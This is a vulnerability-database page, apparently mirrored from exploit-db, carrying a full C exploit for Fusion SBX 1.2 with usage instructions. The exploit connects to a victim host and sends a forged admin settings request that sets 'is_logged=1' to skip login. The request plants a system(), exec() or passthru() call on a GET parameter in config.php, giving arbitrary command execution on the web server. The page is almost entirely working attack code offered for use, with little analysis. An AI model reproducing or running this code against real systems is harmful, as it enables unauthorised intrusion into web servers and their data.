Fusion SBX 1.2 – Remote Command Execution

Fusion SBX 1.2 – Remote Command Execution

漏洞ID 1055116 漏洞类型
发布时间 2005-05-20 更新时间 2005-05-20
图片[1]-Fusion SBX 1.2 – Remote Command Execution-安全小百科CVE编号 N/A
图片[2]-Fusion SBX 1.2 – Remote Command Execution-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/1003
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*****************************************************
*                                                    *
*  [Fusion SBX <= 1.2] exploit                       *
*                                                    *
*  sileFSBXxpl                                       *
*                                                    *
*  This exploit use vulnerability found into         *
*  Fusion SBX and create new variable and call it    *
*  with a malicious function (stored in config.php). *
*  This exploit utilize injection of three diverse   *
*  procedures for execution of arbitrary code on     *
*  vulnerable machine with httpd privileges.         *
*                                                    *
*  References: www.securityfocus.org/bid/13575       * 
*                                                    *
*  coded by: Silentium of Anacron Group Italy        *
*      date: 10/05/2005                              *
*    e-mail: anacrongroupitaly[at]autistici[dot]org  *
*   my_home: www.autistici.org/anacron-group-italy   *
*                                                    *
*  this tool is developed under GPL license          *
*  no(c) .:. copyleft                                *
*                                                    *
*****************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 80		// port of web server 

void info(void);
void banner(void);
void sendxpl(FILE *out, char *argv[], int type);
void errsock(void);
void errgeth(void);
void errconn(char *argv[]);


int main(int argc, char *argv[]){

FILE *out;
int sock, sockconn, type;
struct sockaddr_in addr;
struct hostent *hp;

if(argc!=4)
   info();

type = atoi(argv[3]);

if(type < 1 || type > 3)
   info();

banner();
   
if((sock = socket(AF_INET,SOCK_STREAM,0)) < 0)
   errsock();
   
   printf("[*] Creating socket		[OK]n");

if((hp = gethostbyname(argv[1])) == NULL)
   errgeth();
   
   printf("[*] Resolving victim host	[OK]n");
   
memset(&addr,0,sizeof(addr));
memcpy((char *)&addr.sin_addr,hp->h_addr,hp->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
   
sockconn = connect(sock,(struct sockaddr *)&addr,sizeof(addr));
if(sockconn < 0)
   errconn(argv);
   
   printf("[*] Connecting at victim host   [OK]n");
   
out = fdopen(sock,"a");
setbuf(out,NULL);

sendxpl(out,argv,type);

   printf("[*] Now test at execute code onnn" 
          "[1] %s%sindex.php?sile=idn"
          "[2] %s%sadmin/index.php?sile=idnn",argv[1],argv[2],argv[1],argv[2]);

shutdown(sock,2);
close(sock);

return 0;

}


void info(void){

system("clear");
printf("n   #########################################n"
       "   #             sileFSBXxpl               #n"
       "   #  ###################################  #n"
       "   #       Fusion SBX <= 1.2 exploit       #n"
       "   #       Remote Command Execution        #n"
       "   #          coded by Silentium           #n"            
       "   #        [ Anacron Group Italy ]        #n"
       "   #  ###################################  #n"
       "   # www.autistici.org/anacron-group-italy #n"
       "   #########################################nn"
       " [Usage]nn" 
       "  sileFSBXxpl <victim> <path_sbx> <type>nn"
       "        [Type]nn"
       "              1) injection of system()n"
       "              2) injection of exec()n"
       "              3) injection of passthru()nn"
       " [Example]nn"
       "  sileFSBXxpl www.victim.com /sbx/ 1nn"); 
exit(1);

}


void banner(void){

system("clear");
printf("[-] sileFSBXxpln"
       "    ============n"
       "[-] Fusion SBX <= 1.2 exploitn"
       "[-] coded by Silentium - Anacron Group Italyn"
       "[-] www.autistici.org/anacron-group-italynn");
       
}
       

void sendxpl(FILE *out, char *argv[], int type){

char *call;
int size = 245;

if(type == 1)
   call = "system";
else if(type == 2)
   call = "exec";
else if(type == 3)
   call = "passthru";

size+=strlen(call);
       
fprintf(out,"POST %sadmin/?settings HTTP/1.0n"
            "Connection: Keep-Aliven"
            "Pragma: no-cachen"
            "Cache-control: no-cachen"
            "Accept: text/html, image/jpeg, image/png, text/*, image/*, */*n"
            "Accept-Encoding: x-gzip, x-deflate, gzip, deflate, identityn"
            "Accept-Charset: iso-8859-1, utf-8;q=0.5, *;q=0.5n"
            "Accept-Language: enn"
            "Host: %sn"
            "Content-Type: application/x-www-form-urlencodedn"
            "Content-Length: %dnn"
            "set2=basic&admin_set2=standard&lang2=english&plimit2=10&noname2=Guest&"
            "refresh2=120&maxname2=30%%3B%%40%s%%28%%24_GET%%5Bsile%%5D%%29&maxmess"
            "2=120&maxlink2=120&wordbanning2=1&maxword2=20&wrapstat2=1&postorder2=1"
            "&setsubmit=Commit+Changes&is_logged=1nn",argv[2],argv[1],size,call);
                                  
            printf("[*] Sending exploit		[OK]nn");

}
            
                 
void errsock(void){

system("clear");
printf("[x] Creating socket	[FAILED]nn");
exit(1);

}


void errgeth(void){

printf("[x] Resolving victim host	[FAILED]nn");
exit(1);

}


void errconn(char *argv[]){

printf("[x] Connecting at victim host	[FAILED]nn",argv[1]);
exit(1);

}

// milw0rm.com [2005-05-20]

相关推荐: MercuryBoard f参数跨站攻击漏洞

MercuryBoard f参数跨站攻击漏洞 漏洞ID 1200124 漏洞类型 跨站脚本 发布时间 2005-02-17 更新时间 2005-02-17 CVE编号 CVE-2005-0462 CNNVD-ID CNNVD-200502-065 漏洞平台 N…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享